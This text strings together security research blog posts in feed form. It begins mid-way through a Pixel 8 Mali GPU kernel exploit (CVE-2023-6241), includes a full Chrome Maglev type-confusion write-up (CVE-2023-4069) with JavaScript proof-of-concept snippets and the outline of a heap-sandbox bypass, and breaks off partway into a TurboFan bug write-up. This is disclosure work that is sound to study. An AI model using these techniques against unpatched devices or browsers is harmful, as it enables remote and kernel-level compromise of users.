Note that as delta has to be non zero to trigger the bug, and as delta + old_size pages at the start of the region are mapped, it is still not possible to have the start of the region unmapped like in the case of GHSL-2023-005. So, my only option here is to shrink the region and have the resulting size lie somewhere inside the unmapped gap.

The only way to shrink a JIT region is to use the BASE_KCPU_COMMAND_TYPE_JIT_FREE GPU command to “free” the JIT region. As explained before, this does not actually free the kbase_va_region itself, but rather puts it in a memory pool so that it may be reused on subsequent JIT allocation. Prior to this, kbase_jit_free will also shrink the JIT region according to the initial_commit size of the region, as well as the trim_level that is configured in the kbase_context:


void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
  old_pages = kbase_reg_current_backed_size(reg);
  if (reg->initial_commit initial_commit,
      div_u64(old_pages * (100 - kctx->trim_level), 100));
    u64 delta = old_pages - new_size;
    if (delta) {
      mutex_lock(&kctx->reg_lock);
      kbase_mem_shrink(kctx, reg, old_pages - delta);
      mutex_unlock(&kctx->reg_lock);
    }
  }
  ...
}

Either way, I can control the size of this shrinking. With this in mind, I can arrange the region in the following way:

Create a JIT region and trigger the bug. Arrange the GPU fault so that the fault handler adds fault_size pages, enough pages to cover at least one level 2 PTE.

After the bug is triggered, only the initial old_size + delta pages are mapped to the GPU address space, while the kbase_va_region has old_size + delta + fault_size backing pages in total.
Trigger a second fault at an offset greater than the number of backing pages, so that pages are appended to the region and mapped after the unmapped regions created in the previous step.
Free the JIT region using BASE_KCPU_COMMAND_TYPE_JIT_FREE, which will call kbase_jit_free to shrink the region and remove pages from it. Control the size of this trimming either so that the region size after shrinking (final_size) of the backing store lies somewhere within the unmapped region covered by the first level 2 PTE.

When the region is shrunk, kbase_mmu_teardown_pgd_pages is called to unmap the GPU address mappings, starting from region_start + final_size all the way up to the end of the region. As the entire address range covered by the first level 2 PTE is unmapped, when kbase_mmu_teardown_pgd_pages tries to unmap region_start + final_size, the condition !mmu_mode->pte_is_valid is met at a level 2 PTE and so the unmapping will skip the next 512 pages, starting from region_start + final_size. However, since addresses belonging to the next level 2 PTE are still mapped, these addresses will be skipped incorrectly (the orange region in the next figure), leaving them mapped to pages that are going to be freed:

Once the shrinking is completed, the backing pages are freed and the addresses in the orange region will retain access to already freed pages.

This means that the freed backing page can now be reused as any kernel page, which gives me plenty of options to exploit this bug. One possibility is to use my previous technique to replace the backing page as page table global directories (PGD) of our GPU kbase_context.


int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
    struct tagged_addr *pages, bool partial_allowed)
{
    ...
  /* Get pages from this pool */
  while (nr_from_pool--) {
    p = kbase_mem_pool_remove_locked(pool);     //next_pool) {
    /* Allocate via next pool */
    err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
        nr_4k_pages - i, pages + i, partial_allowed);
        ...
  } else {
    /* Get any remaining pages from kernel */
    while (i != nr_4k_pages) {
      p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
  }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First the pages will be allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool, is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, provided that the memory region is not evicted, the same happens in the opposite direction: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.

As noted in my post Corrupting memory without memory corruption, pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found here.)

Once the freed page is reused as a PGD of a GPU context, the GPU addresses that retain access to the freed page can be used to rewrite the PGD from the GPU. This then allows any kernel memory, including kernel code, to be mapped to the GPU. This then allows me to rewrite kernel code and hence execute arbitrary kernel code. It also allows me to read and write arbitrary kernel data, so I can easily rewrite credentials of my process to gain root, as well as to disable SELinux.

The exploit for Pixel 8 can be found here with some setup notes.

How does this bypass MTE?

So far, I’ve not mentioned any specific measures to bypass MTE. In fact, MTE does not affect the exploit flow of this bug at all. While MTE protects against dereferences of pointers against inconsistent memory blocks, the exploit does not rely on any of such dereferencing at all. When the bug is triggered, it creates inconsistencies between the pages array and the GPU mappings of the JIT region. At this point, there is no memory corruption and neither the GPU mappings nor the pages array, when considered separately, contain invalid entries. When the bug is used to cause kbase_mmu_teardown_pgd_pagesto skip removing GPU mappings, its effect is to cause physical addresses of freed memory pages to be retained in the GPU page table. So, when the GPU accesses the freed pages, it is in fact accessing their physical addresses directly, which does not involve any pointer dereferencing either. On top of that, I’m also not sure whether MTE has any effect on GPU memory accesses anyway. So, by using the GPU to access physical addresses directly, I’m able to completely bypass the protection that MTE offers. Ultimately, there is no memory safe code in the code that manages memory accesses. At some point, physical addresses will have to be used directly to access memory.

Conclusion

In this post, I’ve shown how CVE-2023-6241 can be used to gain arbitrary kernel code execution on a Pixel 8 with kernel MTE enabled. While MTE is arguably one of the most significant advances in the mitigations against memory corruptions and will render many memory corruption vulnerabilities unexploitable, it is not a silver bullet and it is still possible to gain arbitrary kernel code execution with a single bug. The bug in this post bypasses MTE by using a coprocessor (GPU) to access physical memory directly (Case 4 in MTE As Implemented, Part 3: The Kernel). With more and more hardware and software mitigations implemented on the CPU side, I expect coprocessors and their kernel drivers to continue to be a powerful attack surface.

The post Gaining kernel code execution on an MTE-enabled Pixel 8 appeared first on The GitHub Blog.

Getting RCE in Chrome with incomplete object initialization in the Maglev compiler

Man Yue Mo — Tue, 17 Oct 2023 15:00:55 +0000

In this post I’ll exploit CVE-2023-4069, a type confusion vulnerability that I reported in July 2023. The vulnerability—which allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site—is found in v8, the Javascript engine of Chrome. It was filed as bug 1465326 and subsequently fixed in version 115.0.5790.170/.171.

Vulnerabilities like this are often the starting point for a “one-click” exploit, which compromises the victim’s device when they visit a malicious website. What’s more, renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process. That being said, the renderer process has limited privilege and such a vulnerability needs to be chained with a second “sandbox escape” vulnerability (either another vulnerability in the Chrome browser process or one in the operating system) to compromise Chrome itself or the device.

While many of the most powerful and sophisticated “one-click” attacks are highly targeted, and average users may be more at risk from less sophisticated attacks such as phishing, users should still keep Chrome up-to-date and enable automatic updates, as vulnerabilities in v8 can often be exploited relatively quickly.

The current vulnerability, CVE-2023-4069, exists in the Maglev compiler, a new mid-tier JIT compiler in Chrome that optimizes Javascript functions based on previous knowledge of the input types. This kind of optimization is called speculative optimization and care must be taken to make sure that these assumptions on the inputs are still valid when the optimized code is used. The complexity of the JIT engine has led to many security issues in the past and has been a popular target for attackers.

Maglev compiler

The Maglev compiler is a mid-tier JIT compiler used by v8. Compared to the top-tier JIT compiler, TurboFan, Maglev generates less optimized code but with a faster compilation speed. Having multiple JIT compilers is common in Javascript engines, the idea being that with multiple tier compilers, you’ll find a more optimal tradeoff between compilation time and runtime optimization.

Generally speaking, when a function is first run, slow bytecode is generated, as the function is run more often, it may get compiled into more optimized code, first from a lowest-tier JIT compiler. If the function gets used more often, then its optimization tier gets moved up, resulting in better runtime performance—but at the expense of a longer compilation time. The idea here is that for code that runs often, the runtime cost will likely outweigh the compile time cost. You can consult An Introduction to Speculative Optimization in v8 by Benedikt Meurer for more details of how the compilation process works.

The Maglev compiler is enabled by default starting from version 114 of Chrome. Similar to TurboFan, it goes through the bytecode of a Javascript function, taking into account the feedback that was collected from previous runs, and transforms the bytecode into more optimized code. However, unlike TurboFan, which first transforms bytecodes into a “Sea of Nodes”, Maglev uses an intermediate representation and first transforms bytecodes into SSA (Static Single-Assignment) nodes, which are declared in the file maglev-ir.h. At the time of writing, the compilation process of Maglev consists mainly of two phases of optimizations: the first phase involves building a graph from the SSA nodes, while the second phase consists of optimizing the representations of Phi values.

Object construction in v8

The bug in this post really has more to do with object constructions than with Maglev, so now I’ll go through more details and some concepts of how v8 handles Javascript constructions. A Javascript function can be used as a constructor and called with the new keyword. When it is called with new, the new.target variable exists in the function scope that specifies the function being called with new. In the following case, new.target is the same as the function itself.

function foo() {
  %DebugPrint(new.target);
}
new foo();  // foo
foo();      // undefined

This, however, is not always the case and new.target may be different from the function itself. For example, in case of a construction via a derived constructor:


class A {
  constructor() {
    %DebugPrint(new.target);
  }
}

class B extends A {
}

new A();  // A
new B();  // B

Another way to have a different new.target is to use the Reflect.construct built-in function:


Reflect.construct(A, [], B);  // B

The signature of Reflect.construct is as follows, which specifies newTarget as the new.target:


Reflect.construct(target, argumentsList, newTarget)

The Reflect.construct method sheds some light on the role of new.target in object construction. According to the documentation, target is the constructor that is actually executed to create and initialize an object, while newTarget provides the prototype for the created object. For example, the following creates a Function type object and only Function is called.


var x = Reflect.construct(Function, [], Array);

This is consistent with construction via class inheritance:


class A {}

class B extends A {}

var x = new B();
console.log(x.__proto__ == B.prototype);  //<--- true

Although in this case, the derived constructor B does get called. So what is the object that’s actually created? For functions that actually return a value, or for class constructors, the answer is more clear:


function foo() {return [1,2];}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns [1,2]

but less so otherwise:


function foo() {}
function bar() {}
var x = Reflect.construct(foo, [], bar); //<--- returns object {}, instead of undefined

So even if a function does not return an object, using it as target in Reflect.construct still creates a Javascript object. Roughly speaking, object constructions follow these steps: (see, for example, Generate_JSConstructStubGeneric.)

First a default receiver (the this object) is created using FastNewObject, and then the target function is invoked. If the target function returns an object, then the default receiver is discarded and the return value of target is used as the returned object instead; otherwise, the default receiver is returned.

Default `receiver` object

The default receiver object created by FastNewObject is relevant to this bug, so I’ll explain it in a bit more detail. Most Javascript functions contain an internal field, initial_map. This is a Map object that determines the type and the memory layout of the default receiver object created by this function. In v8, Map determines the hidden type of an object, in particular, its memory layout and the storage of its fields. Readers can consult “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens to get a high-level understanding of object types and maps.

When creating the default receiver object, FastNewObject will try to use the initial_map of new.target (new_target) as the Map for the default receiver:


TNode ConstructorBuiltinsAssembler::FastNewObject(
    TNode context, TNode target,
    TNode new_target, Label* call_runtime) {
  // Verify that the new target is a JSFunction.
  Label end(this);
  TNode new_target_func =
      HeapObjectToJSFunctionWithPrototypeSlot(new_target, call_runtime);
  ...
  GotoIf(DoesntHaveInstanceType(CAST(initial_map_or_proto), MAP_TYPE),
         call_runtime);
  TNode initial_map = CAST(initial_map_or_proto);
  TNode new_target_constructor = LoadObjectField(
      initial_map, Map::kConstructorOrBackPointerOrNativeContextOffset);
  GotoIf(TaggedNotEqual(target, new_target_constructor), call_runtime);  //<--- check
  ...

  BIND(&instantiate_map);
  return AllocateJSObjectFromMap(initial_map, properties.value(), base::nullopt,
                                 AllocationFlag::kNone, kWithSlackTracking);
}

This is curious, as the default receiver should have been created using target and new_target should only be used to set its prototype. The reason for this is because of an optimization that caches both the initial_map of target and the prototype of new_target in the initial_map of new_target, which I’ll explain now.

In the above, FastNewObject has a check (marked as “check” in the above snippet) that makes sure that target is the same as the constructor field of the initial_map. For most functions, initial_map is created lazily, or its constructor field is pointing to itself (new_target in this case). So when new_target is first used to construct an object with a different target, the call_runtime slow path is likely taken, which uses JSObject::New:


MaybeHandle JSObject::New(Handle constructor,
                                    Handle new_target,
                                    Handle site) {
  ...
  Handle initial_map;
  ASSIGN_RETURN_ON_EXCEPTION(
      isolate, initial_map,
      JSFunction::GetDerivedMap(isolate, constructor, new_target), JSObject);
  ...
  Handle result = isolate->factory()->NewFastOrSlowJSObjectFromMap(
      initial_map, initial_capacity, AllocationType::kYoung, site);
  return result;
}

This function calls GetDerivedMap, which may call FastInitializeDerivedMap to create an initial_map in the new_target:


bool FastInitializeDerivedMap(Isolate* isolate, Handle new_target,
                              Handle constructor,
                              Handle constructor_initial_map) {
  ...
  Handle map =
      Map::CopyInitialMap(isolate, constructor_initial_map, instance_size,
                          in_object_properties, unused_property_fields);
  map->set_new_target_is_base(false);
  Handle prototype(new_target->instance_prototype(), isolate);
  //Also sets map.prototype to prototype and map.constructor to constructor
  JSFunction::SetInitialMap(isolate, new_target, map, prototype, constructor);
  ...

The initial_map created here is a copy of the initial_map of target (constructor), but with its prototype set to the prototype of new_target and its constructor set to target. This is the only case when the constructor of an initial_map points to a function other than itself and provides the context for the initial_map of new_target to be used in FastNewObject: if the constructor of an initial_map points to a different function, then the initial_map is a copy of the initial_map of the constructor. Checking that new_target.initial_map.constructor equals target, FastNewObject ensures that the initial_map of new_target is a copy of target.initial_map, but with new_target.prototype as its prototype, which is the correct Map to use.

The vulnerability

Derived classes often have no-op default constructors, which do not modify receiver objects, for example:


class A {}
class B extends A {}
class C extends B {}
const o = new C();

In this case, when calling new C(), the default constructor calls to B and A are no-op and can be omitted. The FindNonDefaultConstructorOrConstruct bytecode is an optimization to omit redundant calls to no-op default constructors in these cases. In essence, it walks up the chain of super constructors and skips the default constructors that can be omitted. If it can skip all the intermediate default constructors and reach the base constructor, then FastNewObject is called to create the default receiver object. The bytecode is introduced in a derived class constructor:


class A {}
class B extends A {}
new B();

Running the above with the print-bytecode flag in d8 (the standalone version of v8), I can see that FindNonDefaultConstructorOrConstruct is inserted in the bytecode of the derived constructor B:


[generated bytecode for function: B (0x1a820019ba41 )]
Bytecode length: 45
Parameter count 1
Register count 7
Frame size 56
         0x1a820019be6c @    0 : 19 fe f9          Mov , r1
 1700 S> 0x1a820019be6f @    3 : 5a f9 fa f5       FindNonDefaultConstructorOrConstruct r1, r0, r5-r6
 ...
         0x1a820019be7e @   18 : 99 0c             JumpIfTrue [12] (0x1a820019be8a @ 30)
 ...
         0x1a820019be8a @   30 : 0b 02             Ldar 
         0x1a820019be8c @   32 : ad                ThrowSuperAlreadyCalledIfNotHole
         0x1a820019be8d @   33 : 19 f7 02          Mov r3, 
 1713 S> 0x1a820019be90 @   36 : 0d 01             LdaSmi [1]
 1720 E> 0x1a820019be92 @   38 : 32 02 00 02       SetNamedProperty , [0], [2]
         0x1a820019be96 @   42 : 0b 02             Ldar 
 1727 S> 0x1a820019be98 @   44 : aa                Return

In particular, if FindNonDefaultConstructorOrConstruct succeeds (returns true), then the default receiver object will be returned immediately.

The vulnerability happens in the handling of FindNonDefaultConstructorOrConstruct in Maglev.


void MaglevGraphBuilder::VisitFindNonDefaultConstructorOrConstruct() {
  ...
          compiler::OptionalHeapObjectRef new_target_function =
              TryGetConstant(new_target);
          if (kind == FunctionKind::kDefaultBaseConstructor) {
            ValueNode* object;
            if (new_target_function && new_target_function->IsJSFunction()) {
              object = BuildAllocateFastObject(
                  FastObject(new_target_function->AsJSFunction(), zone(),
                             broker()),
                  AllocationType::kYoung);
  ...

If it manages to skip all the default constructors and reach the base constructor, then it’ll check whether new_target is a constant. If that is the case, then BuildAllocateFastObject, instead of FastNewObject, is used to create the receiver object. The problem is that, unlike FastNewObject, BuildAllocateFastObject uses the initial_map of new_target without checking its constructor field:


ValueNode* MaglevGraphBuilder::BuildAllocateFastObject(
    FastObject object, AllocationType allocation_type) {
  ...
  ValueNode* allocation = ExtendOrReallocateCurrentRawAllocation(
      object.instance_size, allocation_type);
  BuildStoreReceiverMap(allocation, object.map);  // new_target.initial_map
  ...
  return allocation;
}

Why is this bad? As explained before, when constructing an object, target, rather than new_target, is called to initialize the object fields. If new_target is not of the same type as target, then creating an object with the initial_map of new_target can leave fields uninitialized:


class A {}
class B extends A {}
var x = Reflect.construct(B, [], Array);

In this case, new_target is Array, so if the initial_map of new_target is used to create x (receiver), then x is going to be an Array type object, which has a field length that specifies the size of the array and is used for bounds checking. If B, which is the target, is used to initialize the Array object, then length would become uninitialized. This problematic scenario is prevented by checking the constructor of new_target.initial_map to make sure that it is B, and the absence of the check in Maglev results in the vulnerability.

There is one problem here: I need new_target to be a constant to reach this code, but when used with Reflect.construct, new_target is an argument to the function and is never going to be a constant. To overcome this, let’s take a look at what TryGetConstant, which is used in FindNonDefaultConstructorOrConstruct to check that new_target is a constant, does:


compiler::OptionalHeapObjectRef MaglevGraphBuilder::TryGetConstant(
    ValueNode* node, ValueNode** constant_node) {
  if (auto result = TryGetConstant(broker(), local_isolate(), node)) {  //<--- 1.
    if (constant_node) *constant_node = node;
    return result;
  }
  const NodeInfo* info = known_node_aspects().TryGetInfoFor(node);      //is_constant()) {
    if (constant_node) *constant_node = info->constant_alternative;
    return TryGetConstant(info->constant_alternative);
  }
  return {};
}

When checking whether a node is constant, TryGetConstant first checks if the node is a known global constant (marked as 1. in the above), which will be false in our case. However, it also checks NodeInfo for the node to see if it has been marked as a constant by other nodes (marked as 2. in the above). If the value of the node has been checked against a global constant previously, then its NodeInfo will be set to a constant. If that’s the case, then I can store new.target to a global variable that has not been changed, which will cause Maglev to insert a CheckValue node to ensure that new.target is the same as the global constant:


class A {}

var x = Array;

class B extends A {
  constructor() {
    x = new.target;  //<--- insert CheckValue node to cache new.target as constant (Array)
    super();
  }
}

Reflect.construct(B, [], Array); //<--- Calls `B` as `target` and `Array` as `new_target`

When B is optimized by Maglev and the optimized code is run, Reflect.construct is likely to return an Array with length 0. This is because initially, the free spaces in the heap mostly contain zeroes, so when the created Array uses an uninitialized value as its length, this value is most likely going to be zero. However, once a garbage collection is run, the free spaces in the heap will likely contain some non-trivial values (objects that are freed by garbage collection). By creating some objects in the heap, deleting them, and then triggering a garbage collection, I could carefully arrange the heap to make the uninitialized Array created through the bug take any value as its length. In practice, a rather crude trial-and-error approach (which mostly involves triggering a garbage collection and creating uninitialized Array with the bug until you get it right) is sufficient to give me consistent and reliable results:


//----- Create incorrect Maglev code ------
var x = Array;

class B extends A {
  constructor() {
    x = new.target;
    super();
  }
}
function construct() {
  var r = Reflect.construct(B, [], x);
  return r;
}
//Compile optimize code
for (let i = 0; i < 2000; i++) construct();
//-----------------------------------------
//Trigger garbage collection to fill the free space of the heap
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);

corruptedArr = construct();  // length of corruptedArr is 0, try again...
corruptedArr = construct();  // length of corruptedArr takes the pointer of an object, which gives a large value

While this already allows out-of-bounds (OOB) access to a Javascript array, which is often sufficient to gain code execution, the situation is slightly more complicated in this case.

Gaining code execution

The Array created via the bug has no elements, so its element store is set to the empty_fixed_array. The main problem is that empty_fixed_array is located in a read-only region of the v8 heap, which means that an OOB write needs to be large enough to pass the entire read-only heap or it’ll just crash on access:


DebugPrint: 0x10560004d5e5: [JSArray]
 - map: 0x10560018ed39  [FastProperties]
 - prototype: 0x10560018e799 
 - elements: 0x105600000219  [HOLEY_SMI_ELEMENTS]   //<------- address of empty_fixed_array
 ...

As you can see above, the lower 32 bits of the address of empty_fixed_array is 0x219, which is fairly small. The lower 32 bits of the address is called the compressed address. In v8, most references are only stored as the lower 32 bits of the full 64-bit pointers in the heap, while the higher 32 bits remain constant and are cached in a register. In particular, v8 objects are referenced using the compressed address and this is an optimization called pointer compression.

As explained in Section “Bypassing the need to get an infoleak” of my other post, the addresses of many objects are very much constant in v8 and depend only on the software version. In particular, the address of empty_fixed_array is the same across different runs and software versions, and more importantly, it remains a small address. This means most v8 objects are going to be placed at an address larger than that of the empty_fixed_array. In particular, with a large enough length, it is possible to access any v8 object.

While at least in theory, this bug can be used to exploit, it is still unclear how I can use this to access and modify a specific object of my choice. Although I can use the uninitialized Array created by the bug to search through all objects that are allocated behind empty_fixed_array, doing so is inefficient and I may end up accessing some invalid objects that could result in a crash. It would be good if I can at least have an idea of the addresses for objects that I created in Javascript.

In a talk that I gave at the POC2022 conference last year, I shared how object addresses in v8 can indeed be predicted accurately by simply knowing the version of Chrome. What I didn’t know then was that, even after a garbage collection, object addresses can still be predicted reliably.


//Triggers garbage collection
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);

corruptedArr = construct();
corruptedArr = construct();

var oobDblArr = [0x41, 0x42, 0x51, 0x52, 1.5];  //<---- address remains consisten across runs

For example, in the above situation, the object oobDblArr created after garbage collection remains in the same address fairly consistently across different runs. While the address can sometimes change slightly, it is sufficient to give me a rough starting point to search for oobDblArr in corruptedArr (the Array created from the bug). With this, I can corrupt the length of oobDblArr to gain an OOB access with oobDblArr. The exploit flow is now very similar to the one described in my previous post, and consists of the following steps:

Place an Object Array, oobObjArr after oobDblArr, and use the OOB read primitive to read the addresses of the objects stored in this array. This allows me to obtain the address of any v8 object.
Place another double array, oobDblArr2 after oobDblArr, and use the OOB write primitive in oobDblArr to overwrite the element field of oobDblArr2 to an object address. Accessing the elements of oobDblArr2 then allows me to read/write to arbitrary addresses.
While this gives me arbitrary read and write primitives within the v8 heap and also obtains the address of any object, due to the recently introduced heap sandbox in v8, the v8 heap is fairly isolated and it still can’t access arbitrary memory within the renderer process. In particular, I can no longer use the standard method of overwriting the RWX pages that are used for storing Web Assembly code to achieve code execution. Instead, JIT spraying can be used to bypass the heap sandbox.
The idea of JIT spraying is that a pointer to the JIT optimized code of a function is stored in a Javascript Function object, by modifying this pointer using arbitrary read and write primitive within the v8 heap, I can make this pointer jump to the middle of the JIT code. If I use data structures, such as a double array, to store shell code as floating point numbers in the JIT code, then jumping to these data structures will allow me to execute arbitrary code. I refer readers to this post for more details.

The exploit can be found here with some set up notes.

Conclusion

With different tiers of optimizations in Chrome, the same functionality often needs to be implemented multiple times, each with different and specific optimization considerations. For complex routines that rely on subtle assumptions, this can result in security problems when porting code between different optimizations, as we have seen in this case, where the implementation of FindNonDefaultConstructorOrConstructhas missed out an important check.

The post Getting RCE in Chrome with incomplete object initialization in the Maglev compiler appeared first on The GitHub Blog.

Getting RCE in Chrome with incorrect side effect in the JIT compiler

Man Yue Mo — Tue, 26 Sep 2023 15:00:54 +0000

In this post, I’ll explain how to exploit CVE-2023-3420, a type confusion vulnerability in v8 (the Javascript engine of Chrome), that I reported in June 2023 as bug 1452137. The bug was fixed in version 114.0.5735.198/199. It allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site.

Vulnerabilities like this are often the starting point for a “one-click” exploit, which compromise the victim’s device when they visit a malicious website. A renderer RCE in Chrome allows an attacker to compromise and execute arbitrary code in the Chrome renderer process. The renderer process has limited privilege though, so the attacker then needs to chain such a vulnerability with a second “sandbox escape” vulnerability: either another vulnerability in the Chrome browser process, or a vulnerability in the operating system to compromise either Chrome itself or the device. For example, a chain consisting of a renderer RCE (CVE-2022-3723), a Chrome sandbox escape (CVE-2022-4135), and a kernel bug (CVE-2022-38181) was discovered to be exploited in-the-wild in “Spyware vendors use 0-days and n-days against popular platforms” by Clement Lecigne of the Google Threat Analysis Group.

While many of the most powerful and sophisticated “one-click” attacks are highly targeted and average users may be more at risk from less sophisticated attacks such as phishing, users should still keep Chrome up-to-date and enable automatic updates, as vulnerabilities in v8 can often be exploited relatively quickly by analyzing patches once these are released.

The current vulnerability exists in the JIT compiler in Chrome, which optimizes Javascript functions based on previous knowledge of the input types (for example, number types, array types, etc.). This is called speculative optimization and care must be taken to make sure that these assumptions on the inputs are still valid when the optimized code is used. The complexity of the JIT engine has led to many security issues in the past and has been a popular target for attackers. The phrack article, “Exploiting Logic Bugs in JavaScript JIT Engines” by Samuel Groß is a very good introduction to the topic.

The JIT compiler in Chrome

The JIT compiler in Chrome’s v8 Javascript engine is called TurboFan. Javascript functions in Chrome are optimized according to how often they are used. When a Javascript function is first run, bytecode is generated by the interpreter. As the function is called repeatedly with different inputs, feedback about these inputs, such as their types (for example, are they integers, or objects, etc.), is collected. After the function is run enough times, TurboFan uses this feedback to compile optimized code for the function, where assumptions are made based on the feedback to optimize the bytecode. After this, the compiled optimized code is used to execute the function. If these assumptions become incorrect after the function is optimized (for example, new input is used with a type that is different to the feedback), then the function will be deoptimized, and the slower bytecode is used again. Readers can consult, for example, “An Introduction to Speculative Optimization in V8” by Benedikt Meurer for more details of how the compilation process works.

TurboFan itself is a well-studied subject and there is a vast amount of literature out there documenting its inner workings, so I’ll only go through the background that is needed for this article. The article, “Introduction to TurboFan” by Jeremy Fetiveau is a great write-up that covers the basics of TurboFan and will be very useful for understanding the context in this post, although I’ll also cover the necessary material. The phrack article, “Exploiting Logic Bugs in JavaScript JIT Engines” by Samuel Groß also covers many aspects of TurboFan and V8 object layouts that are relevant.

Nodes and side effects

When compiling optimized JIT code, TurboFan first visits each bytecode instruction in the function, and then transforms each of these instructions into a collection of nodes (a process known as reduction), which results in a representation called a “Sea of Nodes.” The nodes are related to each other via dependencies, which are represented as edges in Turbolizer, a tool that is commonly used to visualize the sea of nodes. There are three types of edges: the control edges represent the control flow graph, value edges represent the dataflow graph, and the effect edges, which order nodes according to how they access the state of objects.

For example, in the following:

x.a = 0x41;
var y = x.a;

The operation y = x.a has an effect dependency on x.a = 0x41 and must be performed after x.a = 0x41 because x.a = 0x41 changes the state of x, which is used in y = x.a. Effect edges are important for eliminating checks in the optimized code.

In Chrome, the memory layout, in particular, the offsets of the fields in an object, is specified by its Map, which can be thought of as the type information of the object, and knowledge of Map from feedback is often used by TurboFan to optimize code. (Readers can consult, for example, “JavaScript engine fundamentals: Shapes and Inline Caches” by Mathias Bynens for more details. For the purpose of this post, however, it is sufficient to know that Map determines the field offsets of an object.)

Let’s look a bit closer at how dependency checks are inserted, using this function as the running example:

function foo(obj) {
  var y = obj.x;
  obj.x = 1;
  return y;
}

When accessing the field x of obj, TurboFan uses previous inputs of the parameter obj to speculate the memory layout (determined by the Map of obj) and emits optimized code to access x. Of course, obj with a different Map may be used when calling foo after it is optimized, and so a CheckMaps node is created in the function to make sure that obj has the correct memory layout before the field x is accessed by the optimized code. This can be seen in the graph generated from Turbolizer:

Likewise, when storing to x in the line obj.x = 1, the optimized code assumes obj has the correct map. However, because the map of obj is checked prior to var y = obj.x and there is nothing between these two lines that can change obj, there is no need to recheck the map. Indeed, TurboFan does not generate an extra CheckMaps prior to the StoreField node used in obj.x = 1:

However, nodes can sometimes have side effects, where it may change an object indirectly. For example, a node that invokes a call to a user defined Javascript function can potentially change any object:

function foo(obj) {
  var y = obj.x;
  callback();
  obj.x = 1;
  return y;
}

When a function call is inserted between the accesses to x, the map of obj may change after callback is called and so a CheckMaps is needed prior to the store access obj.x = 1:

In TurboFan, side effects of a node are indicated by node properties. In particular, the kNoWrite property indicates that the node has no side effect:

class V8_EXPORT_PRIVATE Operator : public NON_EXPORTED_BASE(ZoneObject) {
  public:
  ...
  enum Property {
  ...
  kNoWrite = 1 << 4, // Does not modify any Effects and thereby
  // create new scheduling dependencies.
  ...
};

In the above, the call to callback creates a Call node which has the kNoProperties property, which indicates that it can have side effects (instead of kNoWrite, which indicates no side effects).

Compilation dependencies

Assumptions that are made in the optimized code compiled by TurboFan can also become invalid at a later time. In the following example, the function foo has only seen the input a, which has a field x that is constant (that is, the field has not been reassigned):

var a = {x : 1};

function foo(obj) {
  var y = obj.x;
  return y;
}
%PrepareFunctionForOptimization(foo);
foo(a);
%OptimizeFunctionOnNextCall(foo);
foo(a);

When TurboFan compiles the function foo, it assumes that the field x of obj is the constant 1 and simply replaces obj.x with 1. However, this assumption can change in a later time. For example, if I reassign the field x in obj after compilation, then the compiled code would become invalid:

var a = {x : 1};

function foo(obj) {
  var y = obj.x;
  return y;
}
%PrepareFunctionForOptimization(foo);
foo(a);
%OptimizeFunctionOnNextCall(foo);
foo(a);
//Invalidates the optimized code
a.x = 2;

The trace-deopt flag in the standalone d8 binary can be used to check that the code does indeed becomes invalid:

$./d8 --allow-natives-syntax --trace-turbo --trace-deopt foo.js
Concurrent recompilation has been disabled for tracing.
---------------------------------------------------
Begin compiling method foo using TurboFan
---------------------------------------------------
Finished compiling method foo using TurboFan
[marking dependent code 0x1a69002021a5  (0x1a690019b9e9 ) (opt id 0) for deoptimization, reason: code dependencies]


Note the last console output, which marks the function foo for deoptimization, meaning that the optimized code of foo has been invalidated. When foo is run after the line a.x = 2, the unoptimized code will be used instead. Deoptimization that happens when other code invalidates the optimized function is called "lazy deoptimization" as it only has effect when the function is run next time. Note also that the reason for the deoptimization in the last line is code dependencies. Code dependencies is a mechanism employed by TurboFan to make sure that optimized code becomes invalid if its assumptions are changed after the code is compiled.
Under the hood, code dependencies are implemented via the CompilationDependency class. Its subclasses are responsible for making sure that the optimized code is invalidated when the respective assumption becomes invalid. In the above example, the FieldConstnessDependency is responsible for invalidating the optimized code when the constant field, x, in obj is reassigned.
The CompilationDependency class has three virtual methods, IsValid, PrepareInstall, and Install that are called at the end of the compilation. The IsValid method checks that the assumption is still valid at the end of the compilation, while Install establishes a mechanism to invalidate the code when the assumption changes.
Concurrent compilation
Concurrent compilation is a feature that was enabled in version 95 of Chrome. This feature enables TurboFan to compile optimized code in a background thread while the main thread is running other Javascript code. This, however, also gives rise to the possibility of race conditions between compilation and Javascript code executions. On the one hand, Javascript executed in the main thread may invalidate assumptions made during compilation after these assumptions are checked. While many of such issues are prevented by compilation dependencies, this type of race has still resulted in some security issues in the past. (For example, issue 1369871 issue and issue 1211215.)
On the other hand, if compilation makes changes to Javascript objects, it may also cause inconsistency in the Javascript code that is running in the main thread. This is a rather unusual situation, as compilation rarely makes changes to Javascript objects. However, the PrepareInstall method of the CompilationDependency, PrototypePropertyDependency calls the EnsureHasInitialMap method, which does make changes to function, which is a Javascript Function object.

void PrepareInstall(JSHeapBroker* broker) const override {
  SLOW_DCHECK(IsValid(broker));
  Handle function = function_.object();
  if (!function->has_initial_map()) JSFunction::EnsureHasInitialMap(function);
  }
  ...
}
